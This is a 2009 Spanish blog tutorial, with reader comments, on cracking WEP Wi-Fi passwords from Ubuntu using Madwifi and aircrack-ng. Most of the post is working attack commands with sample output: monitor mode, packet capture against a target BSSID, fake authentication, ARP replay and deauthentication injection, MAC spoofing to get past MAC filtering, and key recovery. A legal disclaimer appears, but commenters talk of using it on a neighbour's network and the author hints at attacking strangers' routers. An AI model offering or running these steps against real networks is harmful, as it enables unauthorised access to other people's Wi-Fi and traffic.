Inici > Linux, Mac > Crackear redes wifi con clave WEP desde Ubuntu linux

Crackear redes wifi con clave WEP desde Ubuntu linux

dijous, 19 de març de 2009 Imprimir

Hace poco me volví a interesar por este tema y me costó tanto lograrlo (lo hice posible entre 4 o 5 páginas distintas) que he decidido hacer una entrada reuniendo todos los pasos. Antes de continuar debéis tener presente que esto es ilegal en la mayor parte de los países así que si vais a hacer uso de ello deberá ser sobre VUESTRA red WiFi. Dicho esto, que seguramente pocos haréis caso alguno, procedamos a ello.

Primeros pasos

El primer paso será averiguar si nuestra tarjeta WiFi permite que la activemos en modo monitor. El modo monitor nos permite hacer un tipo de ataque que reduce considerablemente el tiempo de obtención de las claves (de unos días a unos minutos). No obstante, con cualquier tarjeta podéis obtener claves, el problema es que con una tarjeta sin modo monitor tardaréis días o semanas (o quizás nunca la consigáis). En este enlace hay un buen listado de tarjetas inalámbricas dónde se nos indica cuáles están preparadas para hacer inyección (modo monitor) y cuáles no. Si vuestra tarjeta está en esta lista y en la celda de “Inyección” pone “Lx”, ¡premio! Vuestra tarjeta permite la inyección de tráfico. Yo realizaré las pruebas con una D-link DWL con chipset Atheros (cuesta unos 25€ en cualquier tienda de informática). Ahora que sabemos que nuestra tarjeta es compatible debemos instalar los drivers “Madwifi” para dicha tarjeta, ya que son los que nos permiten la inyección de tráfico y el uso de la aplicación aircrack-ng (la utilizada para averiguar las claves wifi). Antes de poder instalar estos drivers necesitáis las herramientas de compilación y las cabeceras necesarias de linux (sin ello la instalación no se completaría). Así que accedemos a una terminal como administrador (tecleando “su” en ella) e instalamos las herramientas mencionadas:

aptitude install build-essential linux-headers-$(uname -r)

Instalar driver Madwifi

Una vez instaladas las cabeceras procedemos a la instalación de Madwifi. Para ello descarguemos la última versión de la web madwifi-project, actualmente la última versión (y la que estoy utilizando yo) es la siguiente: madwifi-hal-0.10.5.6-r3942-20090205.tar.gz Descargad el fichero en la carpeta /tmp/ (por ejemplo) y acceded a ella mediante consola para descomprimir e instalar el fichero:

#ACCEDEMOS A LA CARPETA DONDE HEMOS DESCARGADO MADWIFI
cd /tmp/
#DESCOMPRIMIMOS MADWIFI
tar -xvvzf madwifi-hal-0.10.5.6-r3942-20090205.tar.gz
#ACCEDEMOS A LA CARPETA GENERADA
cd madwifi-hal-0.10.5.6-r3942-20090205
#COMPILAMOS E INSTALAMOS
make && make install

Si estáis reinstalando el driver recordad eliminar el anterior antes de hacer “make && make install”:

rmmod -w ath_pci.ko

Ahora que ya lo tenemos instalado debemos añadir el módulo al kernel de linux:

modprobe ath_pci

Y para añadirlo siempre que arranque el sistema, lo añadimos en el fichero modules situado en la carpeta etc:

echo ath_pci >> /etc/modules

Éste último comando escribe “ath_pci” al final del fichero modules. Si ya habíais instalado anteriormente Madwifi seguramente no sea necesario este paso (comprobad el contenido del fichero con “cat /etc/modules”).

Instalar aircrack-ng

¡Ya tenemos instalado Madwifi! Lo siguiente que haremos será instalar aircrack-ng:

aptitude -y install aircrack-ng

Menuda complicación, ¿eh? 😀

Crackeando redes WEP

Antes de continuar a delante quiero recordaros lo que ya he dicho al principio… La mayoría de países no permiten hacer esto, así que si vais a hacerlo debe ser con consentimiento del dueño de la red que vayáis a atacar.

Activar modo monitor

Ahora que ya tenemos todo lo necesario activaremos el modo monitor de nuestra tarjeta para poder hacer inyección de paquetes. Recordad que el último paso que hicimos fue añadir el módulo de la tarjeta al kernel de linux pero no hemos activado nuestra red. Comprobemos las redes que tenemos activas con “ifconfig”. Al hacerlo observaremos que tenemos una red “wifi0” pero esto es un dispositivo virtual y no nos sirve, así que pondremos en marcha el dispositivo ath0:

wlanconfig ath0 create wlandev wifi0 wlanmode sta

Si al hacerlo recibís el siguiente error:

wlanconfig: ioctl: Invalid argument

Es porque ya tenéis la red ath0 activada, pero para hacerla funcionar correctamente (solo para asegurarnos) haced lo siguiente:

#LO DESTRUIMOS
wlanconfig ath0 destroy
#Y LO VOLVEMOS A CREAR EN MODO STANDALONE (wlanmode sta)
wlanconfig ath0 create wlandev wifi0 wlanmode sta

Sé que parece algo estúpido, pero sin hacer esto probablemente no funcionaría correctamente (la primera vez, dado que hemos instalado los nuevos drivers sin destruir la conexión previamente). Bien, ahora deberíais tener vuestra red wifi funcionando con normalidad y debéis poder conectaros a una red si disponéis de la contraseña. Pasemos pues a activar el modo monitor de una vez:

#LO DESTRUIMOS
wlanconfig ath0 destroy
#Y LO VOLVEMOS A CREAR EN MODO STANDALONE (wlanmode sta)
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Ya la tenemos en modo monitor. Ahora aparentemente no funciona el wifi ya que si vamos a explorar redes con el applet de gnome no encuentra nada. Pero si no habéis recibido error alguno es porque está activado y podéis pasar al siguiente paso.

Escanear redes y capturar paquetes

Primero haremos un escaneo sin especificar canal ni nada, simplemente para ver en qué canal se encuentra nuestra red:

airodump-ng ath0

La pantalla está dividida en dos partes importantes: la de AP (access points), en la parte superior y la de clientes, en la parte inferior.

airodump-ng_thumb

airodump-ng (clic para ampliar)

Las cosas que más nos interesan son BSSID (MAC del AP), PWR (potencia de la señal), #Data que nos dice el número de paquetes captados (paquetes que luego servirán para averiguar la contraseña, cuantos más paquetes más posibilidades de conseguirla), CH (canal), ENC (tipo de encriptación que para seguir este tutorial debe ser WEP), ESSID (nombre de la red), STATION (usuarios conectados al AP). Mi red es la que tiene como nombre “JAZZTEL_2C” con BSSID 00:1A:23:14:23:3C y, evidentemente, esta es la que voy a atacar, así que empecemos capturando paquetes sólo para esta red (lo que reducirá el tamaño del fichero generado):

airodump-ng --channel 11 --bssid 00:1A:23:14:23:3C --write jazztel2c ath0

En negrita están el canal y la BSSID respectivamente, que deberéis cambiar a partir de los datos obtenidos vosotros de vuestra red. El parámetro –write indica dónde el nombre del fichero en el que se guardarán los datos y “ath0” es nuestra interfaz de red.

Comprobar bloqueo MAC

El siguiente paso será comprobar si el punto de acceso tiene activada la restricción MAC, para hacerlo utilizaremos aireplay-ng (en una nueva terminal, por supuesto):

aireplay-ng -1 0 -e JAZZTEL_2C -a 00:1A:23:14:23:3C -h 00:11:22:33:44:55 ath0

El primer parámetro es el tipo de ataque (un número del 0 al 6), en este caso un uno, seguido del número de veces que se va a hacer (0 es la primera posición, así que se repetirá una única vez). El parámetro -e es el nombre de la red, la -a su BSSID y la -h es una MAC inventada (ahí la gracia, saber si nos permite conectarnos con una mac que no exista en su lista negra) y el último parámetro es la interfaz de red que utilizaremos. Si el resultado es…

16:35:29  Sending Authentication Request (Open System) [ACK]
16:35:29  Authentication successful
16:35:29  Sending Association Request [ACK]
16:35:29  Association successful :-) (AID: 1)

El filtro MAC está inhabilitado y podéis pasar al paso “Inyección de paquetes (sin bloqueo mac)”, sino saltad a “Inyección de paquetes (con bloqueo mac)”.

Inyección de paquetes (sin bloqueo mac)

Vayamos al terminal donde tenemos airodump-ng funcionando (captando paquetes) y comprobemos si hay algún STATION asociado al BSSID de la red a atacar. Si es así copiad la MAC de la estación y utilizadla en la siguiente orden:

aireplay-ng -3 -b 00:1A:23:14:23:3C -h 00:16:CB:BA:23:D2 ath0

-3 es el tipo de ataque, -b la bssid a atacar, -h la MAC de la STATION y el último parámetro es la interfaz de red. En caso de no disponer de un STATION debéis poner vuestra MAC, para averiguarla podéis mirarlo en vuestra tarjeta de red o bien con el comando:

ifconfig ath0 | grep HWaddr

Si os da vuestra dirección separada por guiones recordad ponerla separada por puntos y sólo las 6 primeras parejas de números. Hecho esto veréis como aireplay-ng empieza a enviar paquetes al AP. Puede que pasen unos minutos hasta que los “ARP” empiezan a incrementar, pero llegado ese momento podréis ver como los “#Data” de airodump-ng empiezan a subir rápidamente.

aireplay-ng

Inyección de tráfico con aireplay-ng

Si estamos atacando utilizando la mac de un STATION en lugar de la nuestra, nos aparecerá este error:

The interface MAC (06:19:5B:C9:F2:4A) doesn't match the specified MAC (-h).
	ifconfig ath0 hw ether 00:16:CB:BA:23:D2

Esto es porque la mac que le hemos indicado no coincide con la de nuestra tarjeta de red. Para solucionar esto basta con cambiar la mac por la de la estación que estemos emulando (utilizad control+C para terminar el proceso de aireplay-ng, cambiad la MAC y volved a ejecutar aireplay-ng). Para cambiar la MAC pasad al punto Cambiar dirección MAC de la interfaz de red

.

Inyección de paquetes (con bloqueo MAC)

La opción más sencilla a la hora de inyectar paquetes en un AP con bloqueo MAC es hacerse pasar por uno de sus clientes. Para poder hacer esto tenemos que cambiar la dirección MAC, no obstante aireplay-ng tiene la posibilidad de atacar AP con bloqueo MAC (con este proceso no es necesario cambiar la MAC):

aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:11:22:33:44:55
aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:11:22:33:44:55

Es un proceso bastante más lento que sin bloqueo de MAC, pero funciona igualmente. De todos modos si hay alguna estación conectada al AP la mejor opción es que cambiéis vuestra MAC a la de dicha estación.

Cambiar dirección MAC de la interfaz de red

Para ello hay dos maneras de hacerlo, una de ellas nos la indicaba un error de unas líneas más arriba:

ifconfig ath0 hw ether 00:16:CB:BA:23:D2

La otra es utilizar macchanger:

#INSTALAMOS MACCHANGER
aptitude -y install macchanger
#DESACTIVAMOS LA INTERFAZ DE RED ath0
ifconfig ath0 down
#CAMBIAMOS LA MAC
macchanger -m 00:16:CB:BA:23:D2
#REACTIVAMOS LA INTERFAZ DE RED ath0
ifconfig ath0 up

Haciendo esto nos aseguramos que el AP crea que somos uno de sus clientes y facilitará la obtención de paquetes ARP.

aireplay-ng enviando paquetes

aireplay-ng enviando paquetes

Autenticación en el router

En ocasiones puede que se nos presente el siguiente error al ejecutar la inyección de tráfico con aireplay-ng:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?

Esto es debido a que no nos hemos identificado en el router y se da casi siempre que no hay una estación conectada al AP. Podemos solucionarlo de dos formas:

aireplay-ng -1 0 -e JAZZTEL_2C -a 00:1A:23:14:23:3C -h 00:16:CB:BA:23:D2 ath0

Que de ser ejecutado correctamente nos mostrará en pantalla:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

El otro método es el que sigue:

aireplay-ng -1 6000 -o 1 -q 10 -e JAZZTEL_2C -a 00:1A:23:14:23:3C -h 00:16:CB:BA:23:D2 ath0

Aquí estamos indicando que envíe paquetes cada 6 segundos (en milisegundos) y que sólo los envíe en grupos de uno (-o 1) ya que muchos AP se confunden al mandarles muchos paquetes juntos (que es como actúa por defecto).

18:19:20  Sending Authentication Request (Open System) [ACK]
18:19:20  Authentication successful
18:19:20  Sending Association Request [ACK]
18:19:20  Association successful :-) (AID: 1)
18:19:42  Sending keep-alive packet [ACK]
18:19:55  Sending keep-alive packet [ACK]

Ambas son igualmente eficientes (quizás la primera sea un poco más rápida, pero habrá muchas ocasiones en que no podréis utilizarla). Os recomiendo la segunda, ya que no paramos de autenticarnos en el router y no le damos pie a errores.

Averiguando la clave con aircrack-ng

Cuando el número de #Data esté por encima de 30.000 podemos ir ejecutando aircrack-ng en una nueva terminal cargando el fichero que se va guardando (es decir, no paréis la captura de paquetes con airodump, por si no tuviérais suficientes datos):

aircrack-ng jazztel2c-01.cap

Y.. presto! Ya tenemos nuestra clave:

aircrack-ng_thumb

Contraseña desencriptada (clic para ampliar)

Descarga de ficheros

En caso de que no pudierais utilizar “aptitude” porque la máquina desde la cual queréis hacer los ataques no tiene conexión a internet podéis descargar todos los programas que he ido mencionando desde la página de paquetes de ubuntu:

En el caso de los linux-headers debéis descargar la versión correspondiente a vuestra versión de kernel. Para averiguarla podéis hacerlo con “uname”:

uname -r

Recordad destruir la interfaz y reactivarla en modo standalone una vez tengáis la contraseña para poderos conectar normalmente al AP.

Páginas de referencia

Espero haberme explicado con suficiente claridad. Me he pasado mucho tiempo intentando organizarlo de la mejor manera posible. Ahora sólo os queda practicar! Con unas cuántas pruebas le pillaréis el tranquillo 😉

Categories: Linux, Mac Etiquetes:, ,
  1. divendres, 3 d'abril de 2009 a les 15:02 | #1

    Hola!

    He visto que has echo el modo de crakeo, convencional autenticándote contra el AP y demás
    Te traigo(Por si no conoces) Una nueva manera de hacerlo que es utilizando wesside.ng.
    http://seifreed.wordpress.com/2009/03/04/crackeo-de-wep/

    • diumenge, 5 d'abril de 2009 a les 15:51 | #2

      Pues no, no lo conocía @Seifreed. Le echaré un vistazo y haré unas pruebas cuando tenga un rato y quizás lo publique por aquí.

      Gracias por el enlace! 😉

  2. blackened
    dimarts, 7 d'abril de 2009 a les 02:41 | #3

    excelente todo muy bien detallado(a mi no me funciono lo del macchanger) pero vale meti mi propia macadrress, lo cual lo encuentro irrelevante xq de todas maneras se logra el objetivo del tutorial, quiero felicitarte xq se que te has tomado tu tiempo para investigar, para hacer pruebas, y sobre todo para que funcione, y lo mas importante que lo hayas compartido en la web de una manera tan sencilla y simplificada.

    Asi es como piensa un ubuntero, viva Ubuntu vida el software libre SI SEÑOR!!!
    uuhaha haha.

    Un saludo.

  3. davixito
    dijous, 30 d'abril de 2009 a les 23:07 | #4

    hola brother me podrias pasar el link de descarga de ellcd de desencriptado para windows xp o vista y un tutorial porfavor estuve checando tu pagina esta buena pero no encuentro lo q busco ….buen aporte brother

  4. quique
    dilluns, 11 de maig de 2009 a les 18:29 | #5

    ….muy buen tutorial, muchas gracias.

    …………voy corriendo a probarlo a ver si consigo de una vez que me funcione.

    ……….gracias.

  5. Sfold
    dimecres, 10 de juny de 2009 a les 04:02 | #6

    Ohh muchas gracias esta completisimo el tuto, no lo tendras en PDF?

  6. Sfold
    dimecres, 10 de juny de 2009 a les 05:39 | #7

    tengo un problema con la autentificacion… no logro que me autentifique… simplemenente me manda el mensage de que quiere autentificar pero no conecta y manda el error de que “aveces no funciona” pero ya lo intente con varias conexiones(wep)y nada de nada… podrias ayudarme ya sea por aka o en una charla en messenger…?

  7. dijous, 11 de juny de 2009 a les 22:03 | #8

    Perdona pero no te entiendo qué quieres decir con eso del error de que “a veces no funciona”. Puedes darme más detalles? Qué error te da? Qué pasos has hecho y en qué paso estás?

    Y no, no lo tengo en PDF, pero si le das al botón de “vista para imprimir” puedes exportártelo o imprimírtelo tú mismo.

    Salu2

  8. Marco
    dissabte, 27 de juny de 2009 a les 18:40 | #9

    Hola, me he atascado en el primer paso, al escribir el siguiente comando:
    wlanconfig ath0 create wlandev wifi0 wlanmode sta
    Me dice: wlanconfig: ioctl: No such device
    Y tengo los siguientes dispositivos:

    eth0 Link encap:Ethernet HWaddr 00:16:36:57:7c:d7
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
    Interrupt:16 Base address:0x2000

    eth1 Link encap:Ethernet HWaddr 00:16:6f:99:85:ad
    inet addr:192.168.1.4 Bcast:192.168.1.255 Mask:255.255.255.0
    inet6 addr: fe80::216:6fff:fe99:85ad/64 Scope:Link
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:27983 errors:23 dropped:23 overruns:0 frame:0
    TX packets:19054 errors:0 dropped:5 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:32419900 (32.4 MB) TX bytes:2103680 (2.1 MB)
    Interrupt:17 Base address:0xc000 Memory:b0101000-b0101fff

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    inet6 addr: ::1/128 Scope:Host
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:40 errors:0 dropped:0 overruns:0 frame:0
    TX packets:40 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:3200 (3.2 KB) TX bytes:3200 (3.2 KB)

    Me podeis ayudar? Gracias y un saludo!

  9. diumenge, 28 de juny de 2009 a les 10:12 | #10

    Según tu lista de dispositivos no tienes el dispositivo de redes inalámbricas que suele ser “wlanX” (dónde X corresponde al número).

    De todos modos.. has continuado leyendo? Porque justo después de indicar que hagáis esa orden digo que si os da el error que te ha dado hagáis unos pasos.

  10. monstruo
    diumenge, 19 de juliol de 2009 a les 09:39 | #11

    yo me he quedado en el mismo sitio que este chico, a mi me dice que noe xiste el dispositivo… ya lo he intentando destruir y no hay manera, el dispoditivo no existe

  11. diumenge, 19 de juliol de 2009 a les 20:45 | #12

    Hola monstruo, a mi me funciona y no se me ha presentado en ningún momento ese problema. Si fuera un especialista en el tema quizás podría echaros una mano, pero no es el caso…

    Desde la fecha en que creé este post (19 de marzo) no he vuelto a ponerme con este tema, así que tampoco lo tengo muy fresco.

    Siento no poder ayudaros más en este tema…

  12. AvalonMIX
    diumenge, 30 d'agost de 2009 a les 12:48 | #13

    Gracias a tu tutorial lo único que he logrado es quedarme sin wifi en ubuntu…

  13. AvalonMIX
    diumenge, 30 d'agost de 2009 a les 12:49 | #14

    (Mejor que no useis el tuto este…)

  14. dimarts, 1 de setembre de 2009 a les 19:57 | #15

    Mira que hay gente desagradecida en el mundo, eh??

    Y qué casualidad que de todos los que comenten seas el único que se me queja.

  15. romeo
    diumenge, 13 de setembre de 2009 a les 23:17 | #16

    hola, una preguntilla, que soy nuevo en linux y…… como puedo conocer que tarjeta wifi es la mia?? (lo siento pero me falla la memoria XDXD)
    que ocurre si hago el tutorial sin comprobar si funciona (me imagino que no funcionará, ¿pero podría ocurrir algo más?)
    suerte y las felicitaciones por el tutorial te las daré cuando termine :b

  16. dilluns, 14 de setembre de 2009 a les 12:55 | #17

    Pues sinceramente.. ni idea chico. Y es algo que siempre he querido saber hacer… averiguar los componentes que tengo en el PC sin tener que desmontarlo (desde Linux claro… desde Windows siempre podemos utilizar “Everest”).

    En cuánto a qué pasará si haces el tutorial sin tener una tarjeta con un chipset de los recomendados… simplemente no podrás hacer inyección de tráfico, lo que te retrasará mucho a la hora de conseguir una clave.

    Salud y suerte con el tuto!

  17. romeo
    dilluns, 14 de setembre de 2009 a les 19:39 | #18

    hola, no es por desconfiar, pero con lo que nos ha dicho avalonmix + mis no demasiado amplios conocimientos, se me ha puesto la mosca destras de la oreja. ¿dices en el tuto que una vez en modo monitor no podemos conectarnos?¿como volvemos al modo anterior para volver a conectarnos al wifi normalmente?
    ¿se puede hacer esto desde un livecd?, para que no tenga ningun efecto secundario
    suerte y gracias por el tuto, si me fuciona me has hecho un favor
    PD:no entiendo porque no puedo cogerle el wifi a mi vecino si es él el que me invade la casa a mi

  18. NnEo0
    dimecres, 16 de setembre de 2009 a les 03:43 | #19

    hola acabo de robar tu tuto y esta muy bueno gracias, lo he segudio paso por paso y funciona, pro soy novato en linux, el problema es q creo q primero destruyes la wifi para q entre en modo monitor, y efectivamente en el apple de gnome desaparecen las redes, y todo bien pero tengo un problema, no se como activar la tarjeta, es decir hag todo el tutorial, y encuentro la clave wep.
    Apago la pc reinicio y cuando entro al ubuntu ya no aparecen las redes inalambricas, no aparece ninguna, me imagino q es por lo q desactivamos la wifi para entrar a modo monitor… Ahora como puedo hacr para q me aparescan de nuevo las redes??
    gracias por la respuesta y gracias por el tuto :)

  19. NnEo0
    dimecres, 16 de setembre de 2009 a les 16:08 | #20

    hola soy yo de nuevo… :)
    sabes la parte q no se es esta:
    Recordad destruir la interfaz y reactivarla en modo standalone una vez tengáis la contraseña para poderos conectar normalmente al AP.
    como puedo hacer eso??
    ayudame porfavor
    gracias
    :)

  20. Uagadugu
    dijous, 17 de setembre de 2009 a les 11:37 | #21

    Lo primero, darte la gran enhorabuena Booletaire, por como te ha quedado el tutorial, de verdad. Yo que no tengo ni idea de Linux, no he tenido ningún problema (bueno casi ninguno), es increíble hermano! Muchas gracias por currartelo para el saber universal. Buen ejemplo para todos.

    Lo segundo,AvalonMIX eres un auténtico desgraciao desagradecido. Si sueñas con ser un hacker y luego a la primera cagada (tuya por supuesto) le echas la culpa a los demás, olvidate de conseguir nada, ni en esto ni en nada. Mal ejemplo para todos

    Lo tercero, NnEo0, a mi me pasó lo mismo pero hice lo de destruir y vover a crear:
    ” #LO DESTRUIMOS
    wlanconfig ath0 destroy
    #Y LO VOLVEMOS A CREAR EN MODO STANDALONE (wlanmode sta)
    wlanconfig ath0 create wlandev wifi0 wlanmode sta ”
    y me pude conectar a mi red, ahora, no sé porque no se me cargan las páginas, aún estando conectado ¿??? Alguien sabe??

    Por último, Booletaire no entiendo bien que paso debo seguir después de saber que la red que crackeo tiene bloquo MAC.
    Voy a “Inyección de paquetes (con bloqueo MAC)” y de alli meto los comandos
    ” aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:11:22:33:44:55
    aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:11:22:33:44:55 ” pero me dice que la BSSID no existe, de dónde sacaste esta BSSID ..43:A8 ?? Por que en la red que crackeo no hay ninguna estación conectada para copiar su MAC. Que hay que hacer si la red es con bloquo MAC.

    Gracias!

  21. dijous, 17 de setembre de 2009 a les 18:06 | #22

    Primero de todo, lamento a todos el retraso! Llevo un tiempo muy liado en un tema y olvido por completo todo lo demás.

    Volviendo al tema del tutorial… @romeo y @NnEo0, como bien ha dicho @Uagadugu para reactivar la red debéis destruirla y volver a crearla en modo standalone:

    #LO DESTRUIMOS
    wlanconfig ath0 destroy
    #Y LO VOLVEMOS A CREAR EN MODO STANDALONE (wlanmode sta)
    wlanconfig ath0 create wlandev wifi0 wlanmode sta

    Y sí, @romeo, existen LiveCDs preparados ya para esto, como por ejemplo el mítico “Troopix” (actualmente desatendido) o el español “Wifislax” que puedes descargar desde wifislax.com.

    En cuanto al tema que comentas del bloqueo mac, @Uagadugu, recuerdo que cuando lo hice no iba del todo bien.. en algunas redes con esas órdenes parecía capturar paquetes y finalmente podía conectarme pero en otras nada de nada.

    Al final desistí, entre otras cosas porque me parece que si alguien tiene suficientes conocimientos como para ponerse bloqueo mac en el router.. se merece que no le moleste.

    Salud y lamento no poder ayudarte más

    Ah! Y muchas gracias a todos por vuestros comentarios 😀 Con comentarios así da gusto continuar haciendo tutoriales como este..!

  22. spikkk
    divendres, 18 de setembre de 2009 a les 19:26 | #23

    te doy las gracias por el tuto, buenisimo
    pero tengo una cosilla……un poco más arriba aparece un error: no such device, pues me ocurre a mi lo mismo, pero yo tengo un dato, si escribo iwconfig no me aparece wifi0. alguien que me pueda decir algo??
    suerte y gracias

  23. fffes7
    dijous, 10 de desembre de 2009 a les 21:45 | #24

    Excelente, no lo he probado, pero se ve bueno, y en cuanto a un comentario que vi, existe gente muy mal agradecida, que al parece no conoce en lo que se estaba metiendo. XD

Comentaris tancats.